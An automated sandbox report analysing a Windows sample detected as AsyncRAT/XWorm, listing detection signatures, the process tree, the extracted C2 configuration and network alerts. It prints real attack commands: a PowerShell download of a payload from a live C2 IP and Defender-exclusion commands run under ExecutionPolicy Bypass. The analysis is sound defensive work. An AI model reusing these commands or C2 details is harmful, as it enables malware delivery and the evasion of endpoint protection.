Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
da6ke5KbfB.exe

Overview

General Information

Sample name:da6ke5KbfB.exe
renamed because original name is a hash value
Original sample name:a091f671b517c660c7a453158d32218a.exe
Analysis ID:1574852
MD5:a091f671b517c660c7a453158d32218a
SHA1:88e40b83e13fce6b7feb42176685767271e7ce48
SHA256:1cbfb22c0099d4c4fe32190e8f05ae5ecba336e2685e4125b62e93ba8adde55c
Tags:exeuser-abuse_ch
Infos:

Detection

AsyncRAT, Babadeda, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected Babadeda
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • da6ke5KbfB.exe (PID: 5960 cmdline: "C:\Users\user\Desktop\da6ke5KbfB.exe" MD5: A091F671B517C660C7A453158D32218A)
    • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5800 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5908 cmdline: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • x.exe (PID: 616 cmdline: C:\Users\user\AppData\Local\Temp\x.exe MD5: F9A6811D7A9D5E06D73A68FC729CE66C)
        • powershell.exe (PID: 5828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
da6ke5KbfB.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x91d0:$s6: VirtualBox
    • 0x912e:$s8: Win32_ComputerSystem
    • 0x9c56:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9cf3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x9e08:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9872:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\Java Update (32bit).exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      C:\ProgramData\Java Update (32bit).exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\ProgramData\Java Update (32bit).exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\ProgramData\Java Update (32bit).exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x81a4:$s6: VirtualBox
          • 0x8102:$s8: Win32_ComputerSystem
          • 0x8b52:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8bef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8d04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8800:$cnc4: POST / HTTP/1.1
          C:\Users\user\AppData\Local\Temp\x.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                  00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x7fa4:$s6: VirtualBox
                  • 0x7f02:$s8: Win32_ComputerSystem
                  • 0x8952:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x89ef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x8b04:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x8600:$cnc4: POST / HTTP/1.1
                  00000005.00000002.3264722419.000000000234A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 2 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.da6ke5KbfB.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                      0.2.da6ke5KbfB.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                        5.0.x.exe.30000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                          5.0.x.exe.30000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                            5.0.x.exe.30000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                              Click to see the 1 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 616, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', ProcessId: 5828, ProcessName: powershell.exe
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 616, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', ProcessId: 5828, ProcessName: powershell.exe
                              Sigma detected: Suspicious Invoke-WebRequest Execution
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe
                              Sigma detected: Change PowerShell Policies to an Insecure Level
                              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 616, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', ProcessId: 5828, ProcessName: powershell.exe
                              Sigma detected: PowerShell Web Download
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\x.exe, ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 616, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe', ProcessId: 5828, ProcessName: powershell.exe
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 616, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk
                              Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe
                              Sigma detected: Usage Of Web Request Commands And Cmdlets
                              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5800, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe", ProcessId: 5908, ProcessName: powershell.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:45:59.590687+010020185811A Network Trojan was detected192.168.2.54970445.141.26.23480TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:45:59.590687+010020197142Potentially Bad Traffic192.168.2.54970445.141.26.23480TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:47:06.575965+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:11.583700+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:14.102805+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:16.584005+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:21.606828+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:25.089353+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:26.602719+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:30.823369+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:31.606398+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:36.612036+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:38.854075+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:41.610019+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:46.607021+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:49.119922+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:51.602593+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:47:56.625318+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:00.819355+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:01.142564+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:01.643347+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:04.885856+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:06.660233+010028528701Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:47:25.091537+010028529231Malware Command and Control Activity Detected192.168.2.54979245.141.26.2347000TCP
                              2024-12-13T17:47:49.125353+010028529231Malware Command and Control Activity Detected192.168.2.54979245.141.26.2347000TCP
                              2024-12-13T17:48:04.260859+010028529231Malware Command and Control Activity Detected192.168.2.54979245.141.26.2347000TCP
                              2024-12-13T17:48:04.886757+010028529231Malware Command and Control Activity Detected192.168.2.54979245.141.26.2347000TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:47:30.823369+010028528741Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              2024-12-13T17:48:00.819355+010028528741Malware Command and Control Activity Detected45.141.26.2347000192.168.2.549792TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-13T17:47:12.505173+010028559241Malware Command and Control Activity Detected192.168.2.54979245.141.26.2347000TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for URL or domain
                              Source: http://45.141.26.234/x.exeAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Java Update (32bit).exeAvira: detection malicious, Label: TR/Spy.Gen
                              Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Spy.Gen
                              Found malware configuration
                              Source: 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.26.234"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Java Update (32bit).exeReversingLabs: Detection: 78%
                              Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 78%
                              Multi AV Scanner detection for submitted file
                              Source: da6ke5KbfB.exeReversingLabs: Detection: 55%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Java Update (32bit).exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: da6ke5KbfB.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: 45.141.26.234
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: 7000
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: <123456789>
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: <Xwormmm>
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: Xworm
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: USB.exe
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: %ProgramData%
                              Source: 5.0.x.exe.30000.0.unpackString decryptor: Java Update (32bit).exe
                              Source: da6ke5KbfB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Jump to behavior
